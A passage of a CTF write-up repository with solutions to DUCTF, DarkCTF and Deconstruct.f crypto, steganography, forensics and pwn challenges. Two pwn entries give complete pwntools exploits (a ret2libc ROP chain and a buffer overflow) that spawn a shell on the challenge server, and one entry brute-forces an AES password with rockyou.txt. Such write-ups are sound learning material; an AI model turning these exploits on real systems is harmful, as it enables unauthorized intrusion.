7000985606009752754441861235720582603834733127613290649448336518379922443691108836896703766316713029530466877153379023499681743990770084864966350162010821232666205770785101148479008355351759336287346355856788865821108805833681682634789677829987433936120195058542722765744907964994170091794684838166789470509159170062184723590372521926736663314174035152108646055156814533872908850156061945944033275433799625360972646646526892622394837096683592886825828549172814967424419459087181683325453243145295797505798955661717556202215878246001989162198550055315405304235478244266317677075034414773911739900576226293775140327580 9 | 10 | # From factordb 11 | 12 | p = 137526660281921131221818797107719332505145627503966517923070280130875449016216283557144366594925577458093232503891037595787957060953687166721367679274343931891139309595758625134752102980837611457006046816552168551932124923087090435785959383128842381406539452056309367997750395905747259198693037451326868517899 13 | 14 | q = 142330230705328145595283676471239195558844969347785580004001554538877181973869318257471293219512143354019499347549183531116588694914100319083003689276059546015147159203569933280678564050512749524779927522346194056170602443980796876645843108623490893506040488132906421994550401879219627124260709500352428249413 15 | 16 | 17 | 18 | print(p*q == n) 19 | 20 | phi = (p-1)*(q-1) 21 | 22 | d = inverse(e, phi) 23 | 24 | m = pow(c,d,n) 25 | 26 | m = hex(m)[2:] 27 | 28 | print(bytes.fromhex(m)) -------------------------------------------------------------------------------- /DUCTF/crypto/hex-cipher-shift/exploit.py: -------------------------------------------------------------------------------- 1 | ALPHABET = '0123456789abcdef' 2 | 3 | def gen_rules(ciphertext, plaintext): 4 | x = plaintext 5 | y = ciphertext[:len(plaintext)] 6 | s = 7 7 | 8 | xor_rules = [] 9 | xor_res = [] 10 | for i in range(len(plaintext)): 11 | tmp = f"k.index('{x[i]}') ^ {s} = k.index('{y[i]}')".split(' = ') 12 | xor_rules.append(tmp[0]) 13 | xor_res.append(tmp[1]) 14 | s = f"k.index('{x[i]}')" 15 | 16 | return xor_rules, xor_res 17 | 18 | def decrypt(ciphertext, key): 19 | s = 7 20 | plaintext = '' 21 | for i in range(len(ciphertext)): 22 | p = key[key.index(ciphertext[i]) ^ s] 23 | s = key.index(ciphertext[i]) ^ s 24 | plaintext += p 25 | 26 | return plaintext 27 | 28 | def rotate(l, n): 29 | return l[-n:] + l[:-n] 30 | 31 | def get_key(xor_rules, xor_res, plaintext): 32 | k = list(ALPHABET) 33 | 34 | while plaintext not in decrypt(ciphertext, k): 35 | k = rotate(k, 1) 36 | 37 | for i in range(len(xor_rules)): 38 | xorred = eval(xor_rules[i]) 39 | 40 | if xorred != eval(xor_res[i]): 41 | tmp = k[xorred] 42 | tmp_ind = eval(xor_res[i]) 43 | 44 | k[xorred] = xor_res[i][9] 45 | k[tmp_ind] = tmp 46 | return k 47 | 48 | 49 | plaintext = b'The secret message is:'.hex() 50 | 51 | ciphertext = '85677bc8302bb20f3be728f99be0002ee88bc8fdc045b80e1dd22bc8fcc0034dd809e8f77023fbc83cd02ec8fbb11cc02cdbb62837677bc8f2277eeaaaabb1188bc998087bef3bcf40683cd02eef48f44aaee805b8045453a546815639e6592c173e4994e044a9084ea4000049e1e7e9873fc90ab9e1d4437fc9836aa80423cc2198882a' 52 | 53 | xor_rules, xor_res = gen_rules(ciphertext, plaintext) 54 | 55 | k = get_key(xor_rules, xor_res, plaintext) 56 | 57 | print('[Key]\n' + ''.join(k)) 58 | msg = decrypt(ciphertext, k) 59 | print('[MESSAGE]\n' + bytes.fromhex(msg).decode()) 60 | 61 | -------------------------------------------------------------------------------- /DUCTF/crypto/rot-i/README.md: -------------------------------------------------------------------------------- 1 | # rot-i 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | ROT13 is boring! 9 | ``` 10 | 11 | ``` 12 | Ypw'zj zwufpp hwu txadjkcq dtbtyu kqkwxrbvu! Mbz cjzg kv IAJBO{ndldie_al_aqk_jjrnsxee}. Xzi utj gnn olkd qgq ftk ykaqe uei mbz ocrt qi ynlu, etrm mff'n wij bf wlny mjcj :). 13 | ``` 14 | 15 | ## Exploit 16 | 17 | The shift offset increments by 1. 18 | 19 | ```py 20 | text = "IAJBO{ndldie_al_aqk_jjrnsxee}" 21 | 22 | offset = ord('I') - ord('D') 23 | 24 | for i in text.lower(): 25 | if not i.isalpha(): 26 | print(i, end = '') 27 | else: 28 | print(chr((ord(i) - offset - ord('a')) % 26 + ord('a')), end = '') 29 | offset += 1 30 | ``` 31 | 32 | The flag is: 33 | 34 | ``` 35 | DUCTF{crypto_is_fun_kjqlptzy} 36 | ``` -------------------------------------------------------------------------------- /DUCTF/forensics/i-love-scomo/README.md: -------------------------------------------------------------------------------- 1 | # I Love Scomo 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | I really do love Scott Morrison! <3 <3 <3 9 | 10 | However, some people don't like me because of my secret crush :(. So I have to hide my secrets using steganography. This is my hidden space, where I can dream about being with Scomo and I really appreciate that no one tries to reveal my secret message for him. 11 | ``` 12 | 13 | ## Exploit 14 | 15 | In the challenge description, `hidden space` was in bold. This might be useful later. 16 |
17 | 18 | First, you can use `stegcrack` to extract a `txt` file out of the image. The `txt` file is present in [ilovescomo.jpg.out](./ilovescomo.jpg.out). 19 | 20 | In this, you will notice that some lines have a white space in the end, and some do not. This makes sense because `hidden space` was written in bold in the description. We assume that a white space means `1` and the absence of a white space means `0`. Then we convert the obtained binary string to ASCII to get the flag. 21 | 22 | ```py 23 | # Get ilovescomo.jpg.out using stegcrack 24 | text = open('./ilovescomo.jpg.out', 'r').read().split('\n') 25 | 26 | l = ['0'] * len(text) 27 | 28 | for i in range(len(text)): 29 | if text[i] == '': 30 | continue 31 | if text[i][-1] == ' ': 32 | l[i] = '1' 33 | 34 | print(''.join(l)) 35 | 36 | l = [chr(int(''.join(l[i:i+8]), 2)) for i in range(0, len(l), 8)] 37 | 38 | print(''.join(l)) 39 | ``` -------------------------------------------------------------------------------- /DUCTF/forensics/i-love-scomo/ilovescomo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/DUCTF/forensics/i-love-scomo/ilovescomo.jpg -------------------------------------------------------------------------------- /DUCTF/forensics/i-love-scomo/solve.py: -------------------------------------------------------------------------------- 1 | # Get ilovescomo.jpg.out using stegcrack 2 | text = open('./ilovescomo.jpg.out', 'r').read().split('\n') 3 | 4 | l = ['0'] * len(text) 5 | 6 | for i in range(len(text)): 7 | if text[i] == '': 8 | continue 9 | if text[i][-1] == ' ': 10 | l[i] = '1' 11 | 12 | print(''.join(l)) 13 | 14 | l = [chr(int(''.join(l[i:i+8]), 2)) for i in range(0, len(l), 8)] 15 | 16 | print(''.join(l)) -------------------------------------------------------------------------------- /DUCTF/forensics/spot-the-difference/Publish.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/DUCTF/forensics/spot-the-difference/Publish.zip -------------------------------------------------------------------------------- /DUCTF/forensics/spot-the-difference/README.md: -------------------------------------------------------------------------------- 1 | # Spot the Difference 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | Author: TheDon 9 | 10 | An employee's files have been captured by the first responders. The suspect has been accused of using images to leak confidential infomation, steghide has been authorised to decrypt any images for evidence! 11 | ``` 12 | 13 | ## Exploit 14 | 15 | Upon unzipping, you can see a broken png called `Publish/.config/Reminder.png`. When you check it's hexdump, you notice that the first 4 bytes of the `png` are not correct. Fix them using `hexedit Reminder.png` to make them `89 50 4E 47`. 16 | 17 | ``` 18 | 00000000 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D .PNG........ 19 | 0000000C 49 48 44 52 00 00 02 F6 00 00 00 28 IHDR.......( 20 | 00000018 08 06 00 00 00 95 4A BE 56 00 00 0F ......J.V... 21 | 00000024 94 49 44 41 54 78 01 ED 9D BB 6E E3 .IDATx....n. 22 | 00000030 3C 16 C7 8F 17 DF 43 EC F6 36 06 53 <.....C..6.S 23 | 0000003C E4 01 EC 07 58 20 C1 14 53 A5 9C 52 ....X ..S..R 24 | 00000048 E9 16 71 91 62 17 48 95 32 85 D3 C6 ..q.b.H.2... 25 | ``` 26 | 27 | Now, you can see the png. The password contains `1cmVQ`. There are a lot of base64 strings in `Public/.config/secret/`. Use grep to find the right string. 28 | 29 | ```bash 30 | $ grep -rs 1cmVQ 31 | 31/5.txt:CjEyMzRJc0FTZWN1cmVQYXNzd29yZA== 32 | ``` 33 | 34 | Decode this to find the password. 35 | 36 | ```bash 37 | $ echo CjEyMzRJc0FTZWN1cmVQYXNzd29yZA== | base64 -d 38 | 39 | 1234IsASecurePassword 40 | ``` 41 | 42 | Now, go through all the files in `Publish/badfiles` and extract them using steghide with the obtained password. One of them will give you a file, which you can read to get the flag. 43 | 44 | ```py 45 | import os 46 | import subprocess 47 | password = '1234IsASecurePassword' 48 | 49 | x = os.listdir('./Publish/badfiles') 50 | 51 | for i in x: 52 | subprocess.call([ 53 | 'steghide', 54 | 'extract', 55 | '-sf', 56 | f'./Publish/badfiles/{i}', 57 | '-p', 58 | password, 59 | ]) 60 | 61 | print(open('./SecretMessage.txt').read()) 62 | ``` 63 | 64 | The flag is: 65 | 66 | ``` 67 | DUCTF{m0r3_th4n_M33ts_th3_ey3} 68 | ``` -------------------------------------------------------------------------------- /DUCTF/pwn/return-to-what/README.md: -------------------------------------------------------------------------------- 1 | # Return to what 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | Author: Faith 9 | 10 | This will show my friends! 11 | 12 | nc chal.duc.tf 30003 13 | ``` 14 | 15 | ## Exploit 16 | 17 | Ret2libc ROP, but you have to find the libc version online. (I used (libc.rip)[https://libc.rip/]) 18 | 19 | 20 | ```py 21 | from pwn import * 22 | 23 | local = False 24 | 25 | host = 'chal.duc.tf' 26 | port = 30003 27 | 28 | elf = ELF('./return-to-what') 29 | rop = ROP(elf) 30 | 31 | if local: 32 | p = elf.process() 33 | libc = ELF('/usr/lib/libc.so.6') 34 | else: 35 | p = remote(host, port) 36 | libc = ELF('./libc6_2.27-3ubuntu1_amd64.so') 37 | 38 | PUTS_PLT = elf.plt['puts'] 39 | MAIN_PLT = elf.symbols['main'] 40 | 41 | POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0] 42 | RET = rop.find_gadget(['ret'])[0] 43 | 44 | OFFSET = b'A' * (0x30 + 0x8) 45 | 46 | log.info("puts@plt: " + hex(PUTS_PLT)) 47 | log.info("main@plt: " + hex(MAIN_PLT)) 48 | log.info("POP RDI: " + hex(POP_RDI)) 49 | 50 | def get_addr(func_name): 51 | FUNC_GOT = elf.got[func_name] 52 | rop_chain = [ 53 | POP_RDI, FUNC_GOT, 54 | PUTS_PLT, 55 | MAIN_PLT, 56 | ] 57 | 58 | rop_chain = b''.join([p64(i) for i in rop_chain]) 59 | payload = OFFSET + rop_chain 60 | 61 | print(p.clean()) 62 | print(payload) 63 | 64 | p.sendline(payload) 65 | 66 | received = p.recvline().strip() 67 | leak = u64(received.ljust(8, b'\x00')) 68 | libc.address = leak - libc.symbols[func_name] 69 | 70 | return hex(leak) 71 | 72 | log.info('Leak: ' + get_addr('puts')) 73 | log.info('Libc base: ' + hex(libc.address)) 74 | 75 | BIN_SH = next(libc.search(b'/bin/sh')) 76 | SYSTEM = libc.symbols['system'] 77 | EXIT = libc.symbols['exit'] 78 | 79 | ROP_CHAIN = [ 80 | RET, 81 | POP_RDI, BIN_SH, 82 | SYSTEM, 83 | EXIT, 84 | ] 85 | 86 | ROP_CHAIN = b''.join([p64(i) for i in ROP_CHAIN]) 87 | 88 | payload = OFFSET + ROP_CHAIN 89 | 90 | print(p.clean()) 91 | print(payload) 92 | 93 | p.sendline(payload) 94 | 95 | p.interactive() 96 | ``` 97 | 98 | You get a shell. 99 | 100 | ```bash 101 | [*] Switching to interactive mode 102 | $ ls 103 | flag.txt 104 | return-to-what 105 | $ cat flag.txt 106 | DUCTF{ret_pUts_ret_main_ret_where???} 107 | ``` 108 | 109 | The flag is: 110 | 111 | ``` 112 | DUCTF{ret_pUts_ret_main_ret_where???} 113 | ``` -------------------------------------------------------------------------------- /DUCTF/pwn/return-to-what/libc6_2.27-3ubuntu1_amd64.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/DUCTF/pwn/return-to-what/libc6_2.27-3ubuntu1_amd64.so -------------------------------------------------------------------------------- /DUCTF/pwn/return-to-what/return-to-what: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/DUCTF/pwn/return-to-what/return-to-what -------------------------------------------------------------------------------- /DUCTF/pwn/shellthis/README.md: -------------------------------------------------------------------------------- 1 | # Shell this! 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | Author: Faith 9 | 10 | Somebody told me that this program is vulnerable to something called remote code execution? 11 | 12 | I'm not entirely sure what that is, but could you please figure it out for me? 13 | 14 | nc chal.duc.tf 30002 15 | ``` 16 | 17 | ## Exploit 18 | 19 | ```py 20 | from pwn import * 21 | 22 | elf = ELF('./shellthis') 23 | 24 | host = 'chal.duc.tf' 25 | port = 30002 26 | 27 | local = False 28 | 29 | if local: 30 | p = elf.process() 31 | else: 32 | p = remote(host, port) 33 | 34 | print(p.recvuntil('name: ')) 35 | p.clean() 36 | 37 | target = p64(0x4006ca) 38 | 39 | offset = b'a' * (0x30 + 0x8) 40 | 41 | payload = offset + target 42 | p.sendline(payload) 43 | 44 | print(payload) 45 | 46 | p.interactive() 47 | ``` 48 | 49 | ```bash 50 | [*] Switching to interactive mode 51 | $ ls 52 | flag.txt 53 | shellthis 54 | $ cat flag.txt 55 | DUCTF{h0w_d1d_you_c4LL_That_funCT10n?!?!?} 56 | ``` 57 | 58 | The flag is: 59 | 60 | ``` 61 | DUCTF{h0w_d1d_you_c4LL_That_funCT10n?!?!?} 62 | ``` -------------------------------------------------------------------------------- /DUCTF/pwn/shellthis/shellthis: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/DUCTF/pwn/shellthis/shellthis -------------------------------------------------------------------------------- /DarkCTF 2020/Crypto/E-AES/README.md: -------------------------------------------------------------------------------- 1 | # E-AES 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Source 6 | 7 | ``` 8 | 55 2b 31 46 36 34 33 55 2b 31 46 34 42 35 55 2b 31 46 33 33 46 55 2b 31 46 33 41 34 55 2b 31 46 36 41 41 55 2b 31 46 33 30 46 55 2b 31 46 34 30 45 55 2b 31 46 39 34 42 55 2b 31 46 36 41 42 55 2b 31 46 36 30 36 55 2b 31 46 35 32 41 55 2b 31 46 35 32 43 55 2b 31 46 36 41 41 55 2b 32 37 35 33 55 2b 31 46 36 30 37 55 2b 31 46 36 30 36 55 2b 31 46 33 37 34 55 2b 31 46 34 30 44 55 2b 31 46 33 34 43 55 2b 31 46 33 41 34 55 2b 31 46 33 32 41 55 2b 31 46 33 37 34 55 2b 32 36 30 30 55 2b 31 46 36 41 38 55 2b 31 46 34 45 45 55 2b 31 46 36 30 44 55 2b 32 37 30 35 55 2b 31 46 33 43 45 55 2b 31 46 34 41 37 55 2b 31 46 36 42 39 55 2b 31 46 33 30 39 55 2b 31 46 35 32 43 55 2b 32 37 35 33 55 2b 31 46 36 42 39 55 2b 31 46 35 39 30 55 2b 31 46 39 32 33 55 2b 31 46 36 30 36 55 2b 31 46 39 32 33 55 2b 31 46 36 41 38 55 2b 32 33 32 38 55 2b 31 46 36 30 44 55 2b 31 46 36 41 41 55 2b 31 46 33 46 39 55 2b 31 46 35 37 39 55 2b 31 46 36 30 44 55 2b 31 46 33 41 34 55 2b 31 46 33 38 38 55 2b 31 46 33 34 43 55 2b 31 46 39 39 33 55 2b 32 37 35 33 55 2b 31 46 36 30 30 55 2b 32 37 35 33 55 2b 32 36 30 33 55 2b 31 46 33 43 45 55 2b 32 36 30 30 55 2b 32 36 30 32 55 2b 32 37 30 35 55 2b 31 46 36 30 31 55 2b 31 46 33 38 38 55 2b 31 46 34 45 45 55 2b 31 46 36 30 41 55 2b 32 37 31 36 55 2b 31 46 36 41 42 55 2b 32 31 33 39 9 | ``` 10 | 11 | ## Exploit 12 | 13 | The numbers are actually Unicode characters in hex. Convert them to Unicode, and you get a list of emojis. Now convert this Unicode string to base64 and you get: 14 | 15 | ``` 16 | U2FsdGVkX1/SdY61KvbsHKyLM9+cwmnSYmh313LQ9dAN9sBbzYgYIcyu+0BM5xXi 17 | ``` 18 | 19 | Since we do not know the AES key, we can have a simple shell script to bruteforce the key with `rockyou.txt`. 20 | 21 | ```sh 22 | echo "Start!" 23 | while read p; do 24 | # Emojis in base64 25 | printf "U2FsdGVkX1/SdY61KvbsHKyLM9+cwmnSYmh313LQ9dAN9sBbzYgYIcyu+0BM5xXi" | openssl enc -d -base64 -A -aes-256-cbc -md md5 -pass pass:"$p" >> logs.txt 2>>logs.txt 26 | done }! 14 | ``` 15 |

16 | desktop_wallpaper.png 17 |

18 | 19 | ## Exploit 20 | 21 | In the challenge they have mentioned how `his system time doesn't change` keeping this in mind for the later stage of the exploit, we have no luck with the usual exploits `strings desktop_wallpaper.png` or the `meta data` of the file. We could see that the image quality or the pixels of the image seem disturbed, using `stegsolve` on the image leads to.. 22 | 23 |

24 | stegsolve 25 |

26 | 27 | The barcode seems to be a `spotify barcode` and when we scan them they lead to `Level of Concern by Twenty One Pilots` 28 | 29 | Now keeping in mind about how the system time does not change for Mike's computer, we fast forward to the exact timestamp of `1:16` in the song which did not help much. Looking back at the image given, everyone who has seen the Matrix knows that Neo picks the red pill when given a choice. So we go through the `youtube` video of `Level of Concern by Twenty One Pilots` and at the exact timestamp of `1:16` in the captions we find.. 30 | 31 |

32 | flag 33 |

34 | 35 | The flag is 36 | 37 | ``` 38 | dsc{LOC-888-481-90TO} 39 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Mike/desktop_wallpaper.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Mike/desktop_wallpaper.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Mike/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Mike/flag.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Mike/stegsolve.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Mike/stegsolve.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/README.md: -------------------------------------------------------------------------------- 1 | # Teg Rads - Forensics 2 | 3 | Author - [Sanjay Baskaran](http://github.com/sanjaybaskaran01) 4 | 5 | Tag : Forensics , Cryptography 6 | 7 | Requirements: Binwalk 8 | 9 | --- 10 | ## Source 11 | 12 | ``` 13 | Most of the times, what you seek is deep within the user. It starts with a writer, carries on with an actor and ends with a producer. 14 | ``` 15 |

16 | fdp.pdf 17 |

18 | 19 | ## Exploit 20 | 21 | Investigating the given pdf `fdp.pdf`, in an attempt to find hidden texts in the pdf trying ctrl+a gives us 22 | 23 |

24 | ctrl+a 25 |

26 | 27 | `dsc{f0r3n51x_15_fun} dsc{n0t_h3r3_31th3r} 1 dsc{n1c3_try} 1 dsc{f00t_n0t3} would just be too obvious` 28 | and ofcourse none of them were the flags. 29 | 30 | Running the command `strings fdp.pdf` gave us 31 |

32 | strings1 33 |

34 | 35 | which seem to be a base64 encoded string, since the description of the challenge says `It starts with a writer, carries on with an actor and ends with a producer` this meant that the producer is the last part of the flag 36 |

37 | part5 38 |

39 | 40 | and decoding it got us `b4nn3d}` , which looks like the last part of the flag! diving more into the `strings` of the file we see 41 | 42 |

43 | strings2 44 |

45 | Which seems to be an URI encoded component and decoding it gives us 46 |

47 | part1 48 |

49 | 50 | `dsc{public_` the first part of the flag. 51 | 52 | Scrolling down further on strings we find the third part of the flag 53 | 54 |

55 | strings5 56 |

57 | 58 | Decoding the binary we get `0f_` 59 |

60 | part3 61 |

62 | 63 | This text in strings informs us that there are 5 parts of the flag. 64 | 65 |

66 | strings3 67 |

68 | 69 | 70 | 71 | and towards the end of the `strings` we find this 72 | 73 |

74 | strings4 75 |

76 | 77 | which gives us the 2nd part of the flag and tells us that there is a hidden directory containing 4th part of the flag. 78 | 79 | Decoding the 2nd part gives us `d15pl4y_` 80 | 81 |

82 | part2 83 |

84 | 85 | Running binwalk on the pdf and navigating to the 4th part of the flag we find a text file 86 |

87 | p4.txt 88 |

89 | 90 | Decoding the 4th part of the flag in Vigenere Cipher with key as "alexa" (Since alexa is creator of the PDF) 91 |

92 | alexa 93 |

94 |

95 | part4 96 |

97 | 98 | We finally get all parts of the flag! 99 | 100 | 101 | The flag is: 102 | 103 | ``` 104 | dsc{publ1c_d15pl4y_0f_ff3ct10n_b4nn3d} 105 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/alexa.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/alexa.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/ctrl+a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/ctrl+a.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/exploit.py: -------------------------------------------------------------------------------- 1 | a_binary_string = "110000 1100110 1011111" 2 | 3 | binary_values = a_binary_string.split() 4 | 5 | ascii_string = "" 6 | for binary_value in binary_values: 7 | an_integer = int(binary_value, 2) 8 | ascii_character = chr(an_integer) 9 | ascii_string += ascii_character 10 | 11 | print(ascii_string) -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/fdp.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/fdp.pdf -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/p4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/p4.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/part1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/part1.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/part2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/part2.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/part3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/part3.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/part4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/part4.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/part5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/part5.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/pdf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/pdf.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/strings1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/strings1.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/strings2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/strings2.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/strings3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/strings3.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/strings4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/strings4.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/Teg Rads/strings5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/Teg Rads/strings5.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/README.md: -------------------------------------------------------------------------------- 1 | # The Missing Journalist - Forensics 2 | 3 | Author - [Sanjay Baskaran](http://github.com/sanjaybaskaran01) 4 | 5 | Requirements: Binwalk,exiftool 6 | 7 | --- 8 | ## Source 9 | 10 | ``` 11 | It's been a year since you've been a private investigator and you've made quite a name for yourself. You sit there thinking about all the weird cases you've managed in the last year when suddenly, a person bursts through your door saying something about her missing husband. You finally gather that her husband, a renowned journalist who was tracking down a serial killer has suddenly gone missing since last night. The hysterical wife has provided you with a picture of how he looks like. Do you take the case? 12 | ``` 13 |

14 | The missing journalist 15 |

16 | 17 | ## Exploit 18 | 19 | Running the command `strings the_journalist.gif` gave us 20 | 21 |

22 | strings 23 |

24 | 25 | As you can see there was a hidden directory `message/`, We used binwalk to extract the hidden files in the GIF. The PDF present inside was password protected. 26 | 27 |

28 | pdfpassprompt 29 |

30 | 31 | Running exiftool on the GIF gave us 32 |

33 | exiftool 34 |

35 | 36 | which seemed to be a base64 encoded string 37 |

38 | pdfpass 39 |

40 | 41 | Decoding it got us "`h3_w45_l45t_s33n_4t_th4_m0v135`" and voila! this was the password of the PDF and that finally gave us.. 42 |

43 | flag 44 |

45 | 46 | The flag: 47 | 48 | ``` 49 | dsc{1_f0und_h1m_4nd_h35_my_fr13nd} 50 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/exiftool.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/exiftool.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/flag.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/pdfpass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/pdfpass.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/pdfpassprompt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/pdfpassprompt.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/strings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/strings.png -------------------------------------------------------------------------------- /Deconstruct.f/Forensics/The Missing Journalist/the_journalist.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/Forensics/The Missing Journalist/the_journalist.gif -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/AHF/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/OSINT/AHF/1.png -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/AHF/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/OSINT/AHF/2.png -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/AHF/README.md: 